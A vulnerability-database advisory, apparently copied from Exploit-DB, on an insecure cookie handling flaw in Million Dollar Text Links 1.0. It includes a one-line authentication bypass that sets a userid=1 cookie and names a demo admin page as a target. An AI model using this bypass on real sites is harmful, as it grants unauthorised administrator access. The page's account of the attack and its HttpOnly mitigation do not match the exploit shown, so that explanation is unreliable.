Million Dollar Text Links Insecure Cookie Handling Vulnerability

vendor:

Million Dollar Text Links

by:

HxH

7,5

CVSS

HIGH

Insecure Cookie Handling

384

CWE

Product Name: Million Dollar Text Links

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: NO

Related CWE: N/A

CPE: a:cmsnx:million_dollar_text_links

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Million Dollar Text Links Insecure Cookie Handling Vulnerability

Million Dollar Text Links 1.0 is vulnerable to an insecure cookie handling vulnerability. An attacker can exploit this vulnerability by sending a malicious JavaScript code to the victim. The malicious code will set a cookie with the userid set to 1, allowing the attacker to gain access to the application.

Mitigation:

Ensure that cookies are set with the secure flag and that the HttpOnly flag is set to prevent malicious JavaScript code from accessing the cookie.

Source

Exploit-DB raw data:

----------------------------------------------------------------
Million Dollar Text Links Insecure Cookie Handling Vulnerability
----------------------------------------------------------------

Author.: HxH
Contact: HxH[at]live[dot]at

---------------------------

Script.: Million Dollar Text Links 1.0
Home...: http://cmsnx.com/product.about.php?id=12

-------------------------------------------------

Exploit: javascript:document.cookie="userid=1; path=/";

-------------------------------------------------------

demo...: http://kalptarudemos.com/demo/million/admin.php

--------------------------------------------------------

Greetz.: No-Exploit.com Members

-------------------------------

# milw0rm.com [2009-05-27]